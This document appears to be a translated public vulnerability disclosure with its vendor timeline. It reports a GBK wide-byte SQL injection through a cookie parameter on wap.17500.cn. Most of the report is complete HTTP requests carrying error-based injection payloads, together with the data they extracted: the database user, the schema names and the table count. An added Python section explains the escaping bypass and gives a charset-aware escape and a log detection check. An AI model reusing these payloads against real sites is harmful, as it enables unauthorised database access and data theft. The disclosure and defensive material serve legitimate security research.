2015-04-26: Details reported to the vendor; awaiting the vendor's handling
2015-04-27: Vendor confirmed; details disclosed to the vendor only
2015-05-07: Details disclosed to core white hats and experts in related fields
2015-05-08: Vendor has fixed the vulnerability and proactively disclosed it; details disclosed to the public
wap.17500.cn
Wide-byte injection:
GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive
The injection point is the KmGZ_89fa_sid parameter in the cookie.
user: bbs@192.168.100.107
Next, look at the databases:
GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive
Three databases:
information_schema
bbs
test
Get the tables in the bbs database:
GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,table_name,0x5e5e5e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive
378 tables; I had to let Burp enumerate them (the full table list follows in the original report):
Because GPC is enabled, the only option would be to extract all the column names and then guess which table each belongs to, which is a bit tedious, so I did not bother...
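As an added illustration (not part of the original report), the following Python shows why the %bf%27 prefix in the cookie defeats byte-oriented escaping such as magic_quotes_gpc/addslashes when the MySQL connection charset is GBK, what a charset-aware escape does instead, and a simple log check for such values. The cookie value and function names are constructed for this example.

```python
import re
import urllib.parse

# Constructed sample: only the %bf%27 prefix from the report, followed by filler.
SAMPLE_COOKIE = "%bf%27abc"


def addslashes_bytes(data: bytes) -> bytes:
    """Byte-oriented escaping, as PHP addslashes()/magic_quotes_gpc does:
    a backslash (0x5C) is put before quotes and backslashes without any
    knowledge of the connection charset."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives_gbk(escaped: bytes) -> bool:
    """Decode the escaped bytes as GBK, the way a connection with
    character_set_client=gbk reads them. 0xBF 0x5C is consumed as the
    single character 縗, so the protecting backslash vanishes and a bare
    quote remains in the SQL string literal."""
    text = escaped.decode("gbk", errors="replace")
    return re.search(r"(?<!\\)'", text) is not None


def escape_charset_aware(data: bytes, charset: str = "gbk"):
    """Hardened form: decode with the real connection charset first and
    escape characters, not bytes (what mysql_real_escape_string does once
    the charset is set on the connection). An invalid sequence such as
    0xBF followed by a quote is rejected (None) rather than merged.
    Parameterised queries remain the preferred fix."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return escaped.encode(charset)


def looks_like_wide_byte_probe(cookie_value: str) -> bool:
    """Log/WAF check: after percent-decoding, a GBK lead byte (0x81-0xFE)
    immediately followed by a quote character."""
    raw = urllib.parse.unquote_to_bytes(cookie_value)
    return re.search(rb"[\x81-\xfe]['\x22]", raw) is not None
```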
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-04-27 10:27
Thank you for providing the vulnerability information; we will handle it as soon as possible.
2015-05-08: Handled promptly
Following.
May I ask how the OP determined that the parameter in the cookie was vulnerable to wide-byte injection?